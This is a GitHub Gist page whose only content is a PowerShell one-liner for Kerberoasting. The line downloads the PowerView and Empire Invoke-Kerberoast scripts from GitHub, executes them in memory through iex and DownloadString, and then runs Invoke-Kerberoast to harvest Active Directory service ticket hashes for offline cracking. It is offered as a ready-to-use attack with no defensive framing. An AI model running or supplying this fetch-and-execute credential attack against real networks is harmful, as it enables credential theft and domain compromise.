Skip to content

Instantly share code, notes, and snippets.

@FrankSpierings
Last active March 16, 2020 13:59
Show Gist options
  • Select an option

  • Save FrankSpierings/caf1fe0e4caced440ce1f863e047393d to your computer and use it in GitHub Desktop.

Select an option

Save FrankSpierings/caf1fe0e4caced440ce1f863e047393d to your computer and use it in GitHub Desktop.
Kerberoasting Powershell Oneliner(s)
$urls = @("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1","https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; Invoke-Kerberoast
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment